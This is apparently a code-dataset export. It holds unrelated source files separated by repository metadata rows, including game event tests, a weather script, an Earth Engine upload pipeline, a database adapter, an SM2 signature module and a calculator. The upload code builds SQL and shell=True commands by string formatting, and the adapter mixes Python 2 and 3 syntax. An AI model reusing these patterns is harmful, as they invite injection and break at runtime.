@pytest.mark.usefixtures("websocket_prepare_mock")
@pytest.mark.usefixtures("zone_event_manager_listen_mock")
@pytest.mark.usefixtures("zone_event_manager_close_mock")
async def test_events_when_door_author_left_when_back_in_zone(
self,
worldmapc_xena_model: CharacterModel,
worldmapc_arthur_model: CharacterModel,
worldmapc_kernel: Kernel,
socket_send_str_mock: unittest.mock.AsyncMock,
) -> None:
kernel = worldmapc_kernel
xena = worldmapc_xena_model
arthur = worldmapc_arthur_model
request_mock = unittest.mock.AsyncMock()
# Given
door = self._place_door(kernel)
self._create_rule(
kernel, author=xena, door=door, mode=DOOR_MODE__CLOSED, affinity_ids=[]
)
_ = await kernel.server_zone_events_manager.get_new_socket(
request=request_mock,
row_i=1,
col_i=1,
character_id=arthur.id,
)
# When
await kernel.character_lib.move(
character=xena,
to_world_row=1,
to_world_col=2,
)
# Then
socket_send_str_mock.assert_awaited()
events_str_list = [arg[0][0] for arg in socket_send_str_mock.await_args_list]
assert any(["NEW_BUILD" in event_str for event_str in events_str_list])
assert any(['{"WALKING":true}' in event_str for event_str in events_str_list])
# When
socket_send_str_mock.reset_mock()
await kernel.character_lib.move(
character=xena,
to_world_row=1,
to_world_col=1,
)
# Then
socket_send_str_mock.assert_awaited()
events_str_list = [arg[0][0] for arg in socket_send_str_mock.await_args_list]
assert any(["NEW_BUILD" in event_str for event_str in events_str_list])
assert any(['{"WALKING":false}' in event_str for event_str in events_str_list])
@pytest.mark.usefixtures("websocket_prepare_mock")
@pytest.mark.usefixtures("zone_event_manager_listen_mock")
@pytest.mark.usefixtures("zone_event_manager_close_mock")
async def test_events_when_door_author_update_rule(
self,
worldmapc_xena_model: CharacterModel,
worldmapc_arthur_model: CharacterModel,
worldmapc_kernel: Kernel,
socket_send_str_mock: unittest.mock.AsyncMock,
worldmapc_web_app: TestClient,
) -> None:
kernel = worldmapc_kernel
xena = worldmapc_xena_model
arthur = worldmapc_arthur_model
request_mock = unittest.mock.AsyncMock()
web = worldmapc_web_app
# Given
door = self._place_door(kernel)
_ = await kernel.server_zone_events_manager.get_new_socket(
request=request_mock,
row_i=1,
col_i=1,
character_id=arthur.id,
)
# When
response = await web.post(
f"/character/{xena.id}/door/{door.id}?mode={DOOR_MODE_LABELS[DOOR_MODE__CLOSED]}"
)
assert response.status == 200
# Then
socket_send_str_mock.assert_awaited()
events_str_list = [arg[0][0] for arg in socket_send_str_mock.await_args_list]
assert any(["NEW_BUILD" in event_str for event_str in events_str_list])
assert any(['{"WALKING":false}' in event_str for event_str in events_str_list])
| 32.272931
| 93
| 0.643768
| 12,714
| 0.881325
| 848
| 0.058783
| 4,297
| 0.297865
| 8,305
| 0.575697
| 864
| 0.059892
|
b18c5f15c9a68336330b6b76a56071233826bf51
| 1,311
|
py
|
Python
|
myWeather2_github.py
|
RCElectronic/weatherlight
|
5d70b5bdbb67396620c211399c502b801878667f
|
[
"MIT"
] | null | null | null |
myWeather2_github.py
|
RCElectronic/weatherlight
|
5d70b5bdbb67396620c211399c502b801878667f
|
[
"MIT"
] | null | null | null |
myWeather2_github.py
|
RCElectronic/weatherlight
|
5d70b5bdbb67396620c211399c502b801878667f
|
[
"MIT"
] | null | null | null |
# myWeather.py for inkyphat and RPiZW
print('Starting')
try:
import requests
print('requests module imported')
except ImportError:
print('Sorry, need to install requests module')
exit()
wx_url = 'api.openweathermap.org/data/2.5/weather?'
wx_city = 'q=Quispamsis,CA&units=metric'
wx_cityID = 'id=6115383&units=metric'
api_key = '&APPID='+'ENTER YOUR API KEY HERE'
try:
resp = requests.get('http://'+wx_url+wx_cityID+api_key)
print('got data')
except requests.exceptions.RequestException:
print('Cannot connect to service...')
exit()
if resp.status_code != 200:
    raise RuntimeError('GET /weather/ {}'.format(resp.status_code))
try:
city=resp.json()["name"]
    temperature=resp.json()["main"]["temp"] # in celsius
pressure=resp.json()["main"]["pressure"] # in hPa
humidity=resp.json()["main"]["humidity"] # in %
windSpeed = resp.json()["wind"]["speed"] # in m/s
windDeg = resp.json()["wind"]["deg"]
print('got json info')
except (KeyError, ValueError):
print('Cannot read data in api call...')
exit()
print('Weather in', city+':')
print('\tTemperature:\t',str(temperature)+'°C')
print('\tPressure:\t',pressure,'hPa')
print('\tWind:\t\t',windSpeed,'m/s from',str(windDeg)+'°')
print('\tWind:\t\t',
      round(windSpeed*3.6,1),'km/h from',str(windDeg)+'°')  # m/s to km/h is *3.6
| 30.488372
| 64
| 0.617849
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 586
| 0.445967
|
b18cdd01036a990db77da457c825c577e134e9df
| 4,526
|
py
|
Python
|
push-to-gee.py
|
Servir-Mekong/sentinel-1-pipeline
|
79ccba65d974aa5c337adc4d72fa1df8ef75d20c
|
[
"MIT"
] | 16
|
2020-04-19T12:54:55.000Z
|
2022-03-24T18:59:32.000Z
|
push-to-gee.py
|
Servir-Mekong/sentinel-1-pipeline
|
79ccba65d974aa5c337adc4d72fa1df8ef75d20c
|
[
"MIT"
] | 2
|
2021-04-30T21:14:14.000Z
|
2021-06-02T01:39:56.000Z
|
push-to-gee.py
|
Servir-Mekong/sentinel-1-pipeline
|
79ccba65d974aa5c337adc4d72fa1df8ef75d20c
|
[
"MIT"
] | 1
|
2021-04-21T08:58:12.000Z
|
2021-04-21T08:58:12.000Z
|
# -*- coding: utf-8 -*-
from dotenv import load_dotenv
load_dotenv('.env')
import logging
logging.basicConfig(filename='logs/push-2-gee.log', level=logging.INFO)
import glob
import json
import os
import subprocess
from datetime import datetime
from dbio import *
scale_factor = 10000
output_path = os.getenv('OUTPUT_PATH')
final_output = os.getenv('POST_PROCESS_OUTPUT_PATH')
gdal_path = os.getenv('GDAL_PATH')
manifest_dir = os.getenv('MANIFESTS_PATH')
cloud_path = os.getenv('GCS_PATH')
gee_asset_path = os.getenv('GEE_ASSET_PATH')
calc = '{0}gdal_calc.py -A %s --calc="A*{1}" --outfile={2}%s --type=UInt16'.format(gdal_path, scale_factor, final_output)
_cp_to_gs = 'gsutil cp {0}%s {1}'.format(final_output, cloud_path)
_upload_to_gee = 'earthengine upload image --manifest "{0}%s.json"'.format(manifest_dir)
properties = ['acquisitiontype', 'lastorbitnumber', 'lastrelativeorbitnumber', 'missiondatatakeid', 'orbitdirection',
'orbitnumber', 'platformidentifier', 'polarisationmode', 'producttype', 'relativeorbitnumber',
'sensoroperationalmode', 'swathidentifier']
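# The manifest assembled in main() follows the Earth Engine image-manifest
# shape; roughly (illustrative values only):
# {"name": "projects/.../assets/IMG", "tilesets": [{"id": "t0",
#   "sources": [{"uris": ["gs://bucket/IMG_VV.tif"]}]}],
#  "bands": [{"id": "VV", "tileset_id": "t0"}],
#  "start_time": {"seconds": ...}, "end_time": {"seconds": ...},
#  "properties": {...}}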
def get_processed_images(table_name):
query = "SELECT id, title, beginposition, endposition, {} FROM {} WHERE processed={} AND slave={} " \
"AND uploadedtogs={} ORDER BY title;".format(','.join(properties), table_name, True, False, False)
return get_query(query)
def main():
table_name = os.getenv('TABLE_NAME')
processed_images = get_processed_images(table_name)
for image in processed_images:
output_files = glob.glob(output_path + '*{}*.tif'.format(image[1]))
# push to gee
# name
manifest_name = '{}/{}'.format(gee_asset_path, image[1])
# tilesets and bands
manifest_tilesets = []
manifest_bands = []
for index, output in enumerate(output_files):
file_name = output.split(output_path)[1]
# convert to uint 16
calc_command = calc % (output, file_name)
result = subprocess.check_output(calc_command, shell=True)
print(result)
# push to gs
cp_to_gs = _cp_to_gs % (file_name)
result = subprocess.check_output(cp_to_gs, shell=True)
print(result)
if 'VH' in file_name:
tileset_id = 'tileset_for_band_VH_{}'.format(index)
band_id = 'VH'
elif 'VV' in file_name:
tileset_id = 'tileset_for_band_VV_{}'.format(index)
band_id = 'VV'
_tileset = {
'id': tileset_id,
'sources': [
{
'uris': [
'{}/{}'.format(cloud_path, file_name)
]
}
]
}
manifest_tilesets.append(_tileset)
_band = {
'id': band_id,
'tileset_id': tileset_id
}
manifest_bands.append(_band)
# properties
manifest_properties = {}
start_index = 4
for _property in properties:
manifest_properties[_property] = image[start_index]
start_index += 1
manifest_properties['scale_factor'] = scale_factor
# start time
manifest_start_time = {
'seconds': int(round((image[2] - datetime(1970, 1, 1)).total_seconds()))
}
# end time
manifest_end_time = {
'seconds': int(round((image[3] - datetime(1970, 1, 1)).total_seconds()))
}
final_manifest = {
'name': manifest_name,
'tilesets': manifest_tilesets,
'bands': manifest_bands,
'start_time': manifest_start_time,
'end_time': manifest_end_time,
'properties': manifest_properties
}
with open('{}{}.json'.format(manifest_dir, image[1]), 'w') as manifest_file:
            json.dump(final_manifest, manifest_file, ensure_ascii=False, indent=4)
upload_to_gee = _upload_to_gee % (image[1])
        result = subprocess.check_output(upload_to_gee, shell=True).decode()  # decode bytes so the 'ID:' check works on str
print(result)
if 'ID:' in result:
task_id = result.split("ID:")[1].strip()
# save the info
query = "UPDATE {} SET uploadedtogs=TRUE, ee_task_id='{}' WHERE id='{}'".format(table_name, task_id, image[0])
update_query(query)
if __name__ == '__main__':
main()
| 33.776119
| 122
| 0.592134
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,073
| 0.237075
|
b18dfbe911fad785c5c6176e1eec4c5f85de7b49
| 938
|
py
|
Python
|
rabbitai/tasks/celery_app.py
|
psbsgic/rabbitai
|
769e120ba605d56ac076f810a549c38dac410c8e
|
[
"Apache-2.0"
] | null | null | null |
rabbitai/tasks/celery_app.py
|
psbsgic/rabbitai
|
769e120ba605d56ac076f810a549c38dac410c8e
|
[
"Apache-2.0"
] | null | null | null |
rabbitai/tasks/celery_app.py
|
psbsgic/rabbitai
|
769e120ba605d56ac076f810a549c38dac410c8e
|
[
"Apache-2.0"
] | 1
|
2021-07-09T16:29:50.000Z
|
2021-07-09T16:29:50.000Z
|
"""
This is the main entrypoint used by Celery workers. As such,
it needs to call create_app() in order to initialize things properly
"""
from typing import Any
from celery.signals import worker_process_init
# Rabbitai framework imports
from rabbitai import create_app
from rabbitai.extensions import celery_app, db
# Init the Flask app / configure everything
flask_app = create_app()
# Need to import late, as the celery_app will have been setup by "create_app()"
# pylint: disable=wrong-import-position, unused-import
from . import cache, schedules, scheduler # isort:skip
# Export the celery app globally for Celery (as run on the cmd line) to find
app = celery_app
@worker_process_init.connect
def reset_db_connection_pool(**kwargs: Any) -> None: # pylint: disable=unused-argument
with flask_app.app_context():
# https://docs.sqlalchemy.org/en/14/core/connections.html#engine-disposal
db.engine.dispose()
| 32.344828
| 87
| 0.765458
| 0
| 0
| 0
| 0
| 260
| 0.277186
| 0
| 0
| 535
| 0.570362
|
b18ee92e764bf93ddc723331ee49b72f1366542a
| 4,403
|
py
|
Python
|
adapters/adapter.py
|
ChristfriedBalizou/jeamsql
|
abd7735831b572f1f1a2d8e47b0759801fd5881c
|
[
"MIT"
] | null | null | null |
adapters/adapter.py
|
ChristfriedBalizou/jeamsql
|
abd7735831b572f1f1a2d8e47b0759801fd5881c
|
[
"MIT"
] | null | null | null |
adapters/adapter.py
|
ChristfriedBalizou/jeamsql
|
abd7735831b572f1f1a2d8e47b0759801fd5881c
|
[
"MIT"
] | null | null | null |
from tabulate.tabulate import tabulate
import subprocess
import sys
import os
import re
import csv
import io
import json
import errno
class Adapter(object):
def __init__(self,
server=None,
port=None,
user=None,
connection_cmd=None,
cmd=None,
test_query=None,
database=None,
error_regex=None,
password=None,
fmt="sql"):
'''
        The init function contains the connection parameters
        used to initiate the database instance.
'''
self.server = server
self.port = port
self.user = user
self.database = database
self.password = password
self.cmd = cmd
self.test_query = test_query
self.connection_cmd = connection_cmd
        self.error_regex = error_regex
self.fmt = fmt
self.__connection__ = None
def connect(self, test=True):
'''
Open a connection to the database.
'''
if not self.__program_exist__():
raise Exception("Command %s is not installed. the connection failed."
% self.cmd)
        self.__connection__ = subprocess.Popen(
            self.connection_cmd,
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
            universal_newlines=True  # text-mode pipes so str can be passed to communicate()
        )
if test is True:
try:
self.__connection__.communicate(input=self.test_query)
                print('Connection opened successfully.')
except Exception:
raise
def execute(self, query):
'''
        Run a SQL query command without returning
        results.
'''
try:
self.connect(test=False)
        except Exception:
pass
def select(self, query=None, fmt=None):
'''
Runs command and "always" return dictionary array
'''
self.connect(test=False)
def close(self):
'''
Close database connection
'''
self.__connection__.communicate(input="quit")
self.__connection__.kill()
print "Connection closed successfuly."
self.__connection__ = None
def tables(self, name=None, fmt=None):
'''
List all tables. If name is given return the
requested or None
'''
self.connect(test=False)
def description(self, table_name=None, fmt=None):
'''
List all table with descriptions
(table => fields => column : type)
If table_name is given only specified
will be listed
'''
self.connect(test=False)
def __program_exist__(self):
if self.cmd is None:
return True
try:
for cmd in self.cmd:
with open(os.devnull, 'w') as devnull:
subprocess.call([cmd], stderr=devnull)
return True
except OSError as e:
            if e.errno == errno.ENOENT:
return False
return True
def __runsql__(self, sql, fmt=None):
pass
def has_error(self, output):
'''
Check if response from sql server came with error
'''
if self.error_regex is not None:
if re.search(self.error_regex, output) is not None:
return True
return False
def to_response(self, output, fmt=None):
'''
Marshall csv to dictionary
'''
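        # The raw output is assumed to be tab-separated text with a header
        # row, e.g. "id\tname\n1\tfoo" (illustrative); fmt selects csv, json,
        # or an org-style table rendering of that text.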
if fmt == "csv":
return output.encode("utf-8").replace("\t", ",")
docs = []
with io.StringIO(output) as infile:
if fmt == "json":
return self.__to_dict__(infile)
if fmt == "sql":
return self.__to_table__(infile)
if fmt is None:
if self.fmt is "json":
return self.__to_dict__(infile)
return self.__to_table__(infile)
def __to_table__(self, infile):
reader = csv.reader(infile, delimiter='\t')
        headers = next(reader)
return tabulate(reader, headers, tablefmt="orgtbl")
def __to_dict__(self, infile):
docs = []
for row in csv.DictReader(infile, delimiter='\t'):
doc = {key: value for key, value in row.items()}
docs.append(doc)
return json.dumps(docs, indent=4)
| 24.461111
| 81
| 0.539859
| 4,279
| 0.971837
| 0
| 0
| 0
| 0
| 0
| 0
| 954
| 0.21667
|
b18f1a4acb87b8bb932241fcbf259f84c3dba954
| 3,000
|
py
|
Python
|
MyCrypto/dsa/sm2_dsa.py
|
hiyouga/cryptography-experiment
|
d76abc56d6c09c96dd93abcd51d3c9e38fc8787c
|
[
"MIT"
] | 8
|
2019-11-30T14:45:13.000Z
|
2022-03-16T10:09:34.000Z
|
MyCrypto/dsa/sm2_dsa.py
|
hiyouga/Cryptographic-Algorithms-Python
|
d76abc56d6c09c96dd93abcd51d3c9e38fc8787c
|
[
"MIT"
] | null | null | null |
MyCrypto/dsa/sm2_dsa.py
|
hiyouga/Cryptographic-Algorithms-Python
|
d76abc56d6c09c96dd93abcd51d3c9e38fc8787c
|
[
"MIT"
] | null | null | null |
import sys
sys.path.append("../..")
import random
from MyCrypto.utils.bitarray import bitarray
from MyCrypto.algorithms.exgcd import inverse
from MyCrypto.ecc.sm2 import SM2
class SM2_DSA(SM2):
def __init__(self):
super().__init__()
def _identity(self, uid:bitarray, PK) -> bitarray:
entlen = bitarray(len(uid), 16)
a = self._bytes2bits(self._elem2bytes(self._G.a))
b = self._bytes2bits(self._elem2bytes(self._G.b))
gx = self._bytes2bits(self._elem2bytes(self._G.x))
gy = self._bytes2bits(self._elem2bytes(self._G.y))
ax = self._bytes2bits(self._elem2bytes(PK.x))
ay = self._bytes2bits(self._elem2bytes(PK.y))
return self._hash(bitarray.concat((entlen, uid, a, b, gx, gy, ax, ay)))[:256]
def sign(self, M:bytes, uid:bytes, SK:int) -> tuple:
M, uid = self._bytes2bits(M), self._bytes2bits(uid)
PK = SK * self._G
Z = self._identity(uid, PK)
M = bitarray.concat((Z, M))
e = self._bytes2int(self._bits2bytes(self._hash(M)))
while True:
k = random.randint(1, self._n-1)
P = k * self._G
x1 = self._elem2int(P.x)
r = (e + x1) % self._n
if r == 0 or r+k == self._n:
continue
s = (inverse(1+SK, self._n) * (k-r*SK)) % self._n
if s != 0:
break
r, s = self._int2bytes(r, self._byteLen), self._int2bytes(s, self._byteLen)
return (r, s)
def verify(self, M:bytes, sign:tuple, uid:bytes, PK):
r, s = sign
r, s = self._bytes2int(r), self._bytes2int(s)
assert 1 <= r <= self._n-1 and 1 <= s <= self._n-1
M, uid = self._bytes2bits(M), self._bytes2bits(uid)
Z = self._identity(uid, PK)
M = bitarray.concat((Z, M))
e = self._bytes2int(self._bits2bytes(self._hash(M)))
t = (r + s) % self._n
assert t != 0
P = s * self._G + t * PK
x1 = self._elem2int(P.x)
R = (e + x1) % self._n
return R == r
def sign_file(self, fn:str, uid:bytes, SK:int):
with open(fn, 'rb') as f:
data = f.read()
r, s = self.sign(data, uid, SK)
with open(fn+'.sign', 'wb') as f:
f.write(r+s)
def verify_file(self, fn:str, sf:str, uid:bytes, PK):
with open(fn, 'rb') as f:
data = f.read()
with open(sf, 'rb') as f:
sign = f.read()
r, s = sign[:self._byteLen], sign[self._byteLen:]
return self.verify(data, (r, s), uid, PK)
if __name__ == '__main__':
message = b'message'
uid = b'ID:A'
sm2_dsa = SM2_DSA()
sk, pk = sm2_dsa.generate_keys()
sign = sm2_dsa.sign(message, uid, sk)
print(sign)
print(sm2_dsa.verify(message, sign, uid, pk))
''' file test '''
sm2_dsa.sign_file('../testdata/text.txt', uid, sk)
print(sm2_dsa.verify_file('../testdata/text.txt', '../testdata/text.txt.sign', uid, pk))
| 35.714286
| 92
| 0.549667
| 2,409
| 0.803
| 0
| 0
| 0
| 0
| 0
| 0
| 145
| 0.048333
|
b18f8ac4ca91a60fabe49e7603be45706caf3334
| 52
|
py
|
Python
|
chatbot/component/__init__.py
|
zgj0607/ChatBot
|
3c6126754b9d037a04bd80d13874e2ae16b2c421
|
[
"Apache-2.0"
] | null | null | null |
chatbot/component/__init__.py
|
zgj0607/ChatBot
|
3c6126754b9d037a04bd80d13874e2ae16b2c421
|
[
"Apache-2.0"
] | null | null | null |
chatbot/component/__init__.py
|
zgj0607/ChatBot
|
3c6126754b9d037a04bd80d13874e2ae16b2c421
|
[
"Apache-2.0"
] | null | null | null |
__all__ = (
'readonly_admin',
'singleton'
)
| 10.4
| 21
| 0.576923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 27
| 0.519231
|
b18f8f8fa2a426987f403aea37090ba3d3fc94d4
| 5,103
|
py
|
Python
|
calculadora.py
|
LucasCouto22/calculadoraPython
|
84426c8d71f2c2186ae500245423516000e19ec0
|
[
"Apache-2.0"
] | null | null | null |
calculadora.py
|
LucasCouto22/calculadoraPython
|
84426c8d71f2c2186ae500245423516000e19ec0
|
[
"Apache-2.0"
] | null | null | null |
calculadora.py
|
LucasCouto22/calculadoraPython
|
84426c8d71f2c2186ae500245423516000e19ec0
|
[
"Apache-2.0"
] | null | null | null |
def somar(x, y):
    if x >= 0 and y >= 0:
        x = x + y
    return x
def subtrair(x, y):
    if x >= 0 and y >= 0:
        x = x - y
    return x
def multiplicar(x, y):
    if x >= 0 and y >= 0:
        x = x * y
    return x
def dividirInteiro(x, y):
    # integer division, matching the function name and menu option 4
    if x >= 0 and y >= 0:
        x = x // y
    return x
def dividir(x, y):
    # real division, matching the function name and menu option 5
    if x >= 0 and y >= 0:
        x = x / y
    return x
def porcentagem(x, y):
    if x >= 0 and y >= 0:
        x = x * y
        x = x / 100
    return x
def exponencial(x, y):
    if x >= 0 and y >= 0:
        x = x ** y
    return x
def raizQuadrada(x):
    if x >= 0:
        x = x ** 0.5
    return x
controller = 0
fim = 0
while controller != 2:
    if controller == 1 or controller == 0:
        e = int(input('Type a number to choose: \n'
                      ' 1 for addition \n'
                      ' 2 for subtraction \n'
                      ' 3 for multiplication \n'
                      ' 4 for integer division \n'
                      ' 5 for real division \n'
                      ' 6 for percentage \n'
                      ' 7 for exponentiation \n'
                      ' 8 for square root: '))
        if e == 1:
            if controller == 0:
                h = int(input('Type a value: '))
                t = int(input('Type a value to add: '))
                c = somar(h, t)
                fim = c
                print('Result: ', fim)
            elif controller == 1:
                t = int(input('Type a value to add: '))
                c = somar(fim, t)
                fim = c
                print('Result: ', fim)
        elif e == 2:
            if controller == 0:
                h = int(input('Type a value: '))
                t = int(input('Type a value to subtract: '))
                c = subtrair(h, t)
                fim = c
                print('Result: ', fim)
            elif controller == 1:
                t = int(input('Type a value to subtract: '))
                c = subtrair(fim, t)
                fim = c
                print('Result: ', fim)
        elif e == 3:
            if controller == 0:
                h = int(input('Type the first value: '))
                t = int(input('Type the second value: '))
                c = multiplicar(h, t)
                fim = c
                print('Result: ', fim)
            elif controller == 1:
                t = int(input('Type a value to multiply by: '))
                c = multiplicar(fim, t)
                fim = c
                print('Result: ', fim)
        elif e == 4:
            if controller == 0:
                h = int(input('Type the value to be divided: '))
                t = int(input('Type the divisor: '))
                c = dividirInteiro(h, t)
                fim = c
                print('Result: ', fim)
            elif controller == 1:
                t = int(input('Type a divisor: '))
                c = dividirInteiro(fim, t)
                fim = c
                print('Result: ', fim)
        elif e == 5:
            if controller == 0:
                h = int(input('Type the value to be divided: '))
                t = int(input('Type the divisor: '))
                c = dividir(h, t)
                fim = c
                print('Result: ', fim)
            elif controller == 1:
                t = int(input('Type a divisor: '))
                c = dividir(fim, t)
                fim = c
                print('Result: ', fim)
        elif e == 6:
            if controller == 0:
                h = int(input('Type the value: '))
                t = int(input('Type the percentage: '))
                c = porcentagem(h, t)
                fim = c
                print('Final result: ', fim, '%')
                break
            elif controller == 1:
                t = int(input('Type the value to find the percentage of: '))
                c = porcentagem(fim, t)
                fim = c
                print('Final result: ', fim, '%')
                break
        elif e == 7:
            if controller == 0:
                h = int(input('Type the value: '))
                t = int(input('Raised to: '))
                c = exponencial(h, t)
                fim = c
                print('Result: ', fim)
            elif controller == 1:
                t = int(input('Raised to: '))
                c = exponencial(fim, t)
                fim = c
                print('Result: ', fim)
        elif e == 8:
            if controller == 0:
                t = int(input('Number to find the square root of: '))
                c = raizQuadrada(t)
                fim = c
                print('Result: ', fim)
            elif controller == 1:
                c = raizQuadrada(fim)
                fim = c
                print('Result: ', fim)
    controller = int(input('Do you want to continue? \n'
                           'If yes type 1, if no type 2: '))
    if controller == 2:
        print('Final value: ', fim)
        break
| 26.440415
| 77
| 0.406232
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,141
| 0.2232
|
b190d1c3b154f53e7b40cd2cb8a33782b7ce1f7f
| 1,982
|
py
|
Python
|
prime_issue_spoilage/main.py
|
NicholasSynovic/ssl-metrics-github-issue-spoilage
|
05711b6103aa6b6b935d02aa92fbcaf735a63cea
|
[
"BSD-3-Clause"
] | null | null | null |
prime_issue_spoilage/main.py
|
NicholasSynovic/ssl-metrics-github-issue-spoilage
|
05711b6103aa6b6b935d02aa92fbcaf735a63cea
|
[
"BSD-3-Clause"
] | null | null | null |
prime_issue_spoilage/main.py
|
NicholasSynovic/ssl-metrics-github-issue-spoilage
|
05711b6103aa6b6b935d02aa92fbcaf735a63cea
|
[
"BSD-3-Clause"
] | null | null | null |
from argparse import Namespace
from datetime import datetime
import pandas
from dateutil.parser import parse as dateParse
from intervaltree import IntervalTree
from pandas import DataFrame
from prime_issue_spoilage.utils.primeIssueSpoilageArgs import mainArgs
def getIssueTimelineIntervals(day0: datetime, issues: DataFrame) -> list:
intervals = []
foo: str | datetime
bar: str | datetime
for foo, bar in zip(issues["created_at"], issues["closed_at"]):
startDate: datetime = dateParse(str(foo)).replace(tzinfo=None)
endDate: datetime = dateParse(str(bar)).replace(tzinfo=None)
startDaySince0: int = (startDate - day0).days
endDaySince0: int = (endDate - day0).days
intervals.append((startDaySince0, endDaySince0))
return intervals
def buildIntervalTree(intervals: list) -> IntervalTree:
tree: IntervalTree = IntervalTree()
interval: tuple
for interval in intervals:
tree.addi(interval[0], interval[1] + 1, 1)
return tree
def getDailyIssueSpoilage(intervals: IntervalTree, timeline: list) -> list:
return [len(intervals[day]) for day in timeline]
def main() -> None:
args: Namespace = mainArgs()
issues: DataFrame = pandas.read_json(args.input).T
day0: datetime = dateParse(issues["created_at"][0]).replace(tzinfo=None)
dayN: datetime = datetime.now().replace(tzinfo=None)
timeline: list = [day for day in range((dayN - day0).days)]
issues["created_at"] = issues["created_at"].fillna(day0)
issues["closed_at"] = issues["closed_at"].fillna(dayN)
intervals: list = getIssueTimelineIntervals(day0, issues)
intervalTree: IntervalTree = buildIntervalTree(intervals)
dailyIssuesSpoilage: list = getDailyIssueSpoilage(intervalTree, timeline)
data: dict = {
"days_since_0": timeline,
"issue_spoilage": dailyIssuesSpoilage,
}
DataFrame(data).to_json(args.output, indent=4)
if __name__ == "__main__":
main()
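# Editorial sketch, not part of the original module: a toy run of the
# interval-tree spoilage computation. Issue A is open on days 0-3 and
# issue B on days 2-5, so days 2 and 3 have two open issues:
#   tree = buildIntervalTree([(0, 3), (2, 5)])
#   getDailyIssueSpoilage(tree, list(range(6)))  # -> [1, 1, 2, 2, 1, 1]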
| 28.314286
| 77
| 0.706862
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 121
| 0.061049
|
b192038591712556b2d6695f9b0d3ac03bfac07f
| 4,544
|
py
|
Python
|
IFR/mmseg/datasets/pipelines/semi/loading.py
|
jfzhuang/IFR
|
d6ffdd0c0810d7bb244f102ba8cc19c12f61e102
|
[
"MIT"
] | 3
|
2022-03-09T13:15:15.000Z
|
2022-03-21T06:59:10.000Z
|
IFR/mmseg/datasets/pipelines/semi/loading.py
|
jfzhuang/IFR
|
d6ffdd0c0810d7bb244f102ba8cc19c12f61e102
|
[
"MIT"
] | null | null | null |
IFR/mmseg/datasets/pipelines/semi/loading.py
|
jfzhuang/IFR
|
d6ffdd0c0810d7bb244f102ba8cc19c12f61e102
|
[
"MIT"
] | null | null | null |
import os.path as osp
import mmcv
import numpy as np
from mmseg.datasets.builder import PIPELINES
@PIPELINES.register_module()
class LoadImageFromFile_Semi(object):
def __init__(
self, to_float32=False, color_type='color', file_client_args=dict(backend='disk'), imdecode_backend='cv2'
):
self.to_float32 = to_float32
self.color_type = color_type
self.file_client_args = file_client_args.copy()
self.file_client = None
self.imdecode_backend = imdecode_backend
def __call__(self, results):
if self.file_client is None:
self.file_client = mmcv.FileClient(**self.file_client_args)
if results.get('img_prefix') is not None:
filenames_v0_0 = osp.join(results['img_prefix'], results['img_info_v0_0']['filename'])
filenames_v0_1 = osp.join(results['img_prefix'], results['img_info_v0_1']['filename'])
filenames_v1_0 = osp.join(results['img_prefix'], results['img_info_v1_0']['filename'])
filenames_v1_1 = osp.join(results['img_prefix'], results['img_info_v1_1']['filename'])
else:
filenames_v0_0 = results['img_info_v0_0']['filename']
filenames_v0_1 = results['img_info_v0_1']['filename']
filenames_v1_0 = results['img_info_v1_0']['filename']
filenames_v1_1 = results['img_info_v1_1']['filename']
img_bytes = self.file_client.get(filenames_v0_0)
img = mmcv.imfrombytes(img_bytes, flag=self.color_type, backend=self.imdecode_backend)
if self.to_float32:
img = img.astype(np.float32)
results['img_v0_0'] = img
img_bytes = self.file_client.get(filenames_v0_1)
img = mmcv.imfrombytes(img_bytes, flag=self.color_type, backend=self.imdecode_backend)
if self.to_float32:
img = img.astype(np.float32)
results['img_v0_1'] = img
img_bytes = self.file_client.get(filenames_v1_0)
img = mmcv.imfrombytes(img_bytes, flag=self.color_type, backend=self.imdecode_backend)
if self.to_float32:
img = img.astype(np.float32)
results['img_v1_0'] = img
img_bytes = self.file_client.get(filenames_v1_1)
img = mmcv.imfrombytes(img_bytes, flag=self.color_type, backend=self.imdecode_backend)
if self.to_float32:
img = img.astype(np.float32)
results['img_v1_1'] = img
num_channels = 1 if len(img.shape) < 3 else img.shape[2]
results['img_norm_cfg'] = dict(
mean=np.zeros(num_channels, dtype=np.float32), std=np.ones(num_channels, dtype=np.float32), to_rgb=False
)
return results
def __repr__(self):
repr_str = self.__class__.__name__
repr_str += f'(to_float32={self.to_float32},'
repr_str += f"color_type='{self.color_type}',"
repr_str += f"imdecode_backend='{self.imdecode_backend}')"
return repr_str
@PIPELINES.register_module()
class LoadAnnotations_Semi(object):
def __init__(self, reduce_zero_label=False, file_client_args=dict(backend='disk'), imdecode_backend='pillow'):
self.reduce_zero_label = reduce_zero_label
self.file_client_args = file_client_args.copy()
self.file_client = None
self.imdecode_backend = imdecode_backend
def __call__(self, results):
if self.file_client is None:
self.file_client = mmcv.FileClient(**self.file_client_args)
if results.get('seg_prefix', None) is not None:
filename = osp.join(results['seg_prefix'], results['img_info_v0_0']['ann'])
else:
filename = results['img_info_v0_0']['ann']
img_bytes = self.file_client.get(filename)
gt = mmcv.imfrombytes(img_bytes, flag='unchanged', backend=self.imdecode_backend).squeeze().astype(np.uint8)
# modify if custom classes
if results.get('label_map', None) is not None:
for old_id, new_id in results['label_map'].items():
gt[gt == old_id] = new_id
# reduce zero_label
if self.reduce_zero_label:
# avoid using underflow conversion
gt[gt == 0] = 255
gt = gt - 1
gt[gt == 254] = 255
results['gt'] = gt
results['seg_fields'].append('gt')
return results
def __repr__(self):
repr_str = self.__class__.__name__
repr_str += f'(reduce_zero_label={self.reduce_zero_label},'
repr_str += f"imdecode_backend='{self.imdecode_backend}')"
return repr_str
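# Editorial sketch, not part of the original module: how these transforms are
# typically referenced from an mmseg pipeline config once registered; the
# 'img_info_v0_0' .. 'img_info_v1_1' entries consumed above must be filled in
# by the dataset before these transforms run.
#   train_pipeline = [
#       dict(type='LoadImageFromFile_Semi'),
#       dict(type='LoadAnnotations_Semi', reduce_zero_label=False),
#   ]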
| 40.571429
| 116
| 0.650088
| 4,380
| 0.963908
| 0
| 0
| 4,438
| 0.976673
| 0
| 0
| 748
| 0.164613
|
b192ffd8dc0dbef0c193761ff4f0641070958f09
| 3,384
|
py
|
Python
|
topologies/dc_t1.py
|
andriymoroz/sai-challenger
|
